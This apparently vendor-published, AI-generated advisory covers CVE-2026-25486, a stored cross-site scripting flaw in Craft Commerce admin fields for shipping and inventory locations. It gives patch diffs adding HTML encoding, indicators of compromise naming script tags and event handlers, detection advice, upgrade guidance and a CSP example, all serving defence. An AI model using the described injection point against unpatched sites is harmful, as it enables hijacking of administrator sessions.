CVE-2026-25486 Overview
CVE-2026-25486 is a stored Cross-Site Scripting (XSS) vulnerability in Craft Commerce, an ecommerce platform for Craft CMS. The vulnerability allows attackers to execute malicious JavaScript in an administrator's browser by exploiting improper input sanitization in the Shipping Methods Name field within the Store Management section of the admin panel.
Critical Impact
Attackers with high-privileged access can inject persistent malicious scripts that execute in the context of other administrators' sessions, potentially leading to session hijacking, privilege abuse, or unauthorized actions within the Craft Commerce admin panel.
Affected Products
- Craft Commerce versions 5.0.0 through 5.5.1
- Craft CMS installations utilizing Craft Commerce for ecommerce functionality
- Store Management admin panel interfaces
Discovery Timeline
- 2026-02-03 - CVE CVE-2026-25486 published to NVD
- 2026-02-04 - Last updated in NVD database
Technical Details for CVE-2026-25486
Vulnerability Analysis
This stored XSS vulnerability occurs due to insufficient output encoding when rendering user-supplied data in the Craft Commerce admin panel. Specifically, the Shipping Methods Name field and related inventory location data are displayed without proper HTML entity encoding, allowing specially crafted input containing JavaScript to be stored in the database and later executed when other administrators view the affected pages.
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). The attack requires network access and high privileges (administrator-level access to create or modify shipping methods), along with user interaction from another administrator viewing the malicious content.
Root Cause
The root cause is the absence of HTML encoding when outputting user-controlled values in the admin interface. Fields such as $inventoryLocation->getAddressLine() and $shippingCategory->name were rendered directly into the page without sanitization using functions like Html::encode().
The vulnerable code paths were identified in:
- src/controllers/InventoryLocationsController.php - address field output
- src/controllers/ShippingCategoriesController.php - shipping category name output
Attack Vector
An attacker with administrative access to Craft Commerce can inject malicious JavaScript payloads into the Shipping Methods Name field or related inventory location fields. When another administrator navigates to the Store Management section and views these records, the unsanitized script executes in their browser context.
The following patch demonstrates how the vulnerability was addressed by adding proper HTML encoding:
'id' => $inventoryLocation->id,
'title' => $inventoryLocation->getUiLabel(),
'handle' => $inventoryLocation->handle,
- 'address' => $inventoryLocation->getAddressLine(),
+ 'address' => Html::encode($inventoryLocation->getAddressLine()),
'url' => $inventoryLocation->getCpEditUrl(),
'delete' => $inventoryLocations->count() > 1 ? $deleteButton : '',
];
Source: GitHub Commit
A similar fix was applied to the shipping categories controller:
// Generate table data with chips
$tableData = [];
foreach ($shippingCategories as $shippingCategory) {
- $label = Craft::t('site', $shippingCategory->name);
+ $label = Html::encode(Craft::t('site', $shippingCategory->name));
$tableData[] = [
'id' => $shippingCategory->id,
'title' => $label,
Source: GitHub Commit
Detection Methods for CVE-2026-25486
Indicators of Compromise
- Unusual JavaScript code or HTML tags present in shipping method names, shipping category names, or inventory location address fields
- Unexpected network requests originating from admin panel pages to external domains
- Database entries containing script tags or event handlers (e.g., <script>, onerror=, onload=) in commerce-related tables
Detection Strategies
- Implement Web Application Firewall (WAF) rules to detect and block XSS payloads in form submissions to the Craft Commerce admin panel
- Review admin audit logs for creation or modification of shipping methods and inventory locations with suspicious character patterns
- Deploy Content Security Policy (CSP) headers to restrict inline script execution and report violations
Monitoring Recommendations
- Enable browser-based XSS auditing and CSP violation reporting to capture attempted script injections
- Monitor database tables related to shipping methods, categories, and inventory locations for entries containing HTML special characters or JavaScript
- Configure SentinelOne to alert on anomalous outbound connections from web server processes that may indicate successful XSS exploitation
How to Mitigate CVE-2026-25486
Immediate Actions Required
- Upgrade Craft Commerce to version 5.5.2 or later immediately
- Review existing shipping methods, shipping categories, and inventory location records for any suspicious entries containing script tags or JavaScript event handlers
- Temporarily restrict admin panel access to trusted IP addresses while patching is in progress
Patch Information
The vulnerability has been patched in Craft Commerce version 5.5.2. The fix applies proper HTML encoding using Html::encode() to user-supplied values before rendering them in the admin panel. Organizations should update to this version or later to remediate the vulnerability.
For detailed patch information, see the GitHub Security Advisory GHSA-g92v-wpv7-6w22 and the version 5.5.2 release.
Workarounds
- Implement strict Content Security Policy (CSP) headers that disable inline scripts and restrict script sources to trusted domains
- Sanitize database entries by manually reviewing and cleaning shipping method names and inventory location addresses for malicious content
- Limit administrative access to the Store Management section to only essential personnel until the patch can be applied
# Example CSP header configuration for Apache
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; object-src 'none'; frame-ancestors 'self';"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
